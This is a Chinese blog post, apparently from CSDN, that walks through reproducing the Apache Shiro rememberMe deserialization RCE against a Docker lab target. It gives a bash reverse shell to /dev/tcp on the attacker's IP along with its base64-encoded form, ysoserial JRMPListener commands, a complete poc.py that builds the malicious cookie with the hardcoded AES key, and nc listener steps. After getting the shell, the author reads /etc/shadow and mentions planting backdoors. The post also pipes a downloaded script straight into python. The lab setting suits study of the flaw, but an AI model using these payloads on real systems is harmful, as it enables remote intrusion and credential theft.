Shiro反序列化漏洞【详细解析】

最新推荐文章于 2024-09-13 20:56:37 发布
最新推荐文章于 2024-09-13 20:56:37 发布
阅读量1.5k 收藏 2
点赞数 2
分类专栏: java 文章标签: mysql hdfs debian
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67392126/article/details/126596239
版权

Shiro是什么东西

  • Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理
  • shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

原理解释https://www.freebuf.com/vuls/178014.html

什么是硬编码:
硬编码要求程序的源代码在输入数据或所需格式发生变化时进行更改,以便最终用户可以通过程序外的某种方式更改细节。

漏洞位置

http 请求包 cookie 中的 rememberMe 参数。
该漏洞对shiro<=1.2.4的版本有影响。

攻击流程图

环境搭建

靶机:192.168.43.132
攻击机:192.168.43.131

  • 获取docker镜像

    docker pull medicean/vulapps:s_shiro_1

  • 重启docker

    systemctl restart docker

  • 启动docker镜像:

    docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1

  • 访问: http://192.168.43.132:8081 / 环境搭建成功

下载工具

ysoserial的jar文件

依次执行以下命令(jar的文件名要和脚本中的一样,文件要和脚本在同一目录下)

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial

mvn package -DskipTests

出现了特殊问题

如果出现一下情况的话,是没有安装maven的。【解决mvn command not found:下一个就好了】

解决:mvn command not found

linux安装maven

转载:https://www.cnblogs.com/yuexiaoyun/articles/13033946.html

1、安装 wget 命令:

yum -y install wget

【如果提示yum command not found的话,别理他,这是安装wget命令,一般我们的都已经安装好了】

2、下载maven安装包

wget http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz

3.解压maven安装包

tar -zxvf apache-maven-3.5.4-bin.tar.gz

4.配置maven:

vim /etc/profile

在配置文件配置中加上:

export MAVEN_HOME=/root/apache-maven-3.5.4 (这个目录换成你的 maven 解压后的文件所在目录)

export PATH= M A V E N _ H O M E / b i n : MAVEN\_HOME/bin: MAVEN_HOME/bin:PATH

让文件生效,刷新配置文件 :

source /etc/profile

5.查看maven 版本:

mvn -version

或者

mvn -v

现在的话mvn已经可以在/etc/profile这个文件里面操作。

关键要在source /etc/profile里面进入ysoserial这个目录

cd ysoserial

mvn package -DskipTests

这样就可以了

现在就解决了mvn command not found的情况。

制作反弹shell 代码

  • 使用http://www.jackson-t.ca/runtime-exec-payloads.html 进行编码

转载:http://www.jackson-t.ca/runtime-exec-payloads.html

攻击机:192.168.43.131

bash -i >& /dev/tcp/192.168.43.131/999 0>&1

999端口是监听反弹端口(nc -lvnp 999)

使用ysoserial中JRMP监听模块,监听1001端口

  • 攻击机:192.168.43.131 中执行命令:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1001 CommonsCollections4 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjEzMS85OTkgMD4mMQ==}|{base64,-d}|{bash,-i}’

【 ’ ’ 里面的是刚刚bash编码】

一定要进入ysoserial的target里面,因为要用到target里面的ysoserial-0.0.6-SNAPSHOT-all.jar

使用poc.py 生成Payload

  • 在攻击机:192.168.43.131 中生成rememberMe

    python poc.py 192.168.43.131:1001

【把poc.py也放在/ysoserial/target里面执行】

poc.py代码

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
 
def encode_rememberme(command):

    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
 
 
if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())

出现了特殊问题

如果出现下面的这种情况,【Crypto.Cipher import AES ImportError】

用easy_install安装pycrypto:

easy_install pycrypto-2.6.tar.gz

转载:https://blog.csdn.net/feier7501/article/details/9265551

这里提示easy_install:command not found 【那就下一个】

用wget下载:

wget https://bootstrap.pypa.io/ez_setup.py -O - | python

转载:https://blog.csdn.net/chenji9967/article/details/100623972

然后就可以用easy_install

又出现了新的问题 。【找不到这个pycrypto-2.6.tar.gz,那就换一个再试】

还是用easy_install 下载:

easy_install pycrypto

转载:https://blog.csdn.net/weixin_34327223/article/details/92066493

这里就报错了

error: Setup script exited with error: command ‘x86_64-linux-gnu-gcc’ failed with exit status 1

上网搜了一下资料也是找到了解决的办法。

安装好python环境之后顺便安装对应版本的dev:

sudo apt-get install python-dev python3-dev

继续用easy_install 下载:

easy_install pycrypto

用poc.py生成rememberMe

终于成功啦。【哭死了,好辛苦啊】

监听反弹端口 999

  • 攻击机:192.168.43.131 中执行命令:

nc -lvnp 999

开启kali里面的burpsuit。

用浏览器打开,填写提供的Usename Password , 记住一定要勾选Remember Me。

抓登录界面的包。

用刚刚构造的rememberMe,放到jsessionid后面

这个时候nc的反弹shell就过来了

思考了一下,得到这个tmp下的root权限又能干什么,自己就玩了一下。

1.目录的一个遍历

2.cat /etc/shadow

3.发现这个只是读写的root权限,应该有本地提权的一些办法得到更高的权限,有了读写的权限,后门木马都可以随便放。

小结:虽然这次漏洞的复现并不是很难理解,但是网上有很多的东西都没有说明白,讲清楚或者没有遇到的问题,当自己操作起来就会发现很多bug,一个一个找,对于新手来说比较的困难,所以我就做了一个比较详细的漏洞复现。

因为自己是一个比较容易放弃的人,很高兴在面对很多困难的时候没有第一时间的放弃,最后成功的复现。

作为一个东软的大三的学生,今年对咱们大三的学生不太友好,现在是凌晨00:45我还在这里唠叨,接下来就是准备复习面试的知识,找实习工作出来打工,祝愿自己找到一份满意的工作,身体健康,早点脱单【这个有点难度哈】。

希望看过此贴的人都能够——

在试炼的终点是花开万里,愿你起程渺小,结尾壮大。

m0_67392126
关注
专栏目录
shiro反序列化测试工具.zip
06-04
在这个名为"shiro反序列化测试工具.zip"的压缩包中,包含的是用于检测Shiro框架是否存在反序列化漏洞的测试工具。这些工具可以帮助开发者或安全研究员识别并修复潜在的安全隐患,确保应用的安全性。 以下是关于...
Shiro反序列化漏洞
qq_40882763的博客
02-21 2941
Shiro反序列化漏洞 目录 Shiro反序列化漏洞 1.1 漏洞介绍 1.1.1 漏洞简介 1.1.2 影响版本 1.1.3 漏洞原理 1.1.4 漏洞特征 1.1.5 漏洞影响   1.2 环境配置 1.3 漏洞检测 ​​1.4 漏洞利用 1.5 防御措施 参考: 一、Shrio反序列化导致命令执行(Shiro-550 CVE-2016-4437) 1.1 漏洞介绍 1.1.1 漏洞简介   Apache Shiro是一款开源企业常见JAVA安全框架,提供...
Shiro框架以及反序列化漏洞
最新发布
2301_79096184的博客
09-13 906
key值(漏洞点就是这个)
漏洞复现】Shiro 反序列化漏洞
2301_80115097的博客
11-08 2280
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
shiro反序列化漏洞
wutiangui的博客
09-07 2488
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中,保证对象的完整性和可传递性;反序列化即逆过程,由字节流还原成对象。根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。漏洞影响版本。
shiro反序列化一键测试工具
12-12
对于Shiro反序列化一键测试工具,这份文档应该详细说明了如何运行jar文件,如何配置参数以指向目标系统,以及如何解释测试结果。阅读这份文档对于正确使用工具至关重要。 `data`目录可能包含了工具运行时需要的一些...
linux下java反序列化通杀回显方法的低配版实现 - 先知社区1
08-03
然而,利用Shiro反序列化漏洞的挑战在于找到有效的gadget和实现带内回显,特别是当回显不在HTTP响应包中,而是在响应包之前时。 作者在浏览Twitter时发现了一种解决带内回显问题的方法,这种方法基于一篇名为《通杀...
061-Apache Shiro 反序列化之殇.pdf
09-20
在特定版本(如1.2.4及更早版本)中,Shiro的一个反序列化漏洞成为了黑客攻击的目标。 这个漏洞主要涉及到Shiro的Remember Me功能。Remember Me允许用户在关闭浏览器后仍然保持登录状态,以便下次访问时自动登录。...
Java代码执行漏洞中类动态加载的应用1
08-03
类动态加载的一个实际应用案例是Apache Shiro框架的反序列化漏洞利用。在内网渗透场景下,由于无法直接写jsp页面或者进行网络通信,动态加载字节码可以绕过这些限制。例如,可以将reGeorg代理的代码嵌入到动态注册的...
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6561
shiro反序列化漏洞
shiro反序列化漏洞的原理和复现
热门推荐
LJH1999ZN的博客
03-31 1万+
一、shiro简介 Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。Shiro首要的和最重要的目标就是容易使用并且容易理解。 二、shiro的身份认证工作流程 通过前端传入的值, 获取rememberMe cookie base64加密 AES加密 (对称加解密) 反序列化 三、shiro反序列化漏洞原理 AES加密的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES
漏洞分析 | 经典的Shiro反序列化
2301_80115097的博客
03-26 1910
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
Shiro框架漏洞
slismy的博客
09-12 5440
一、Shiro漏洞原理 Apache Shiro框架提供了记住我的功能(RemeberMe),用户登录成功后会生成经过加密并编码的cookie。 cookie的key为RemeberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的 在服务端接收cookie值时,按以下步骤解析: 检索RemeberMe cookie的值 Base 64解码 使用ACE解密(加密密钥硬编码) 进行反序列化操作(未作过滤处理) 在调用反序列化的时候未进行任何过滤,导致
Shiro反序列化漏洞原理详解及复现
Javachichi的博客
05-06 1005
生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传。在登录时勾选Remember me,burp抓包可以看到,响应包的set-cookie字段存在rememberMe。删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送。AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心。
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
小宇的web博客
02-05 7191
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550、Shiro-721 Shiro-550反序列漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对reme
Apache Shiro 1.2.4反序列化漏洞
07-27
Apache Shiro 1.2.4版本之前存在一个反序列化漏洞。在这个版本之前,默认的ASE密钥是固定的,这意味着攻击者可以直接反序列化执行恶意代码。然而,在1.2.4版本之后,ASE密钥不再是默认的,需要获取到密钥才能进行...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值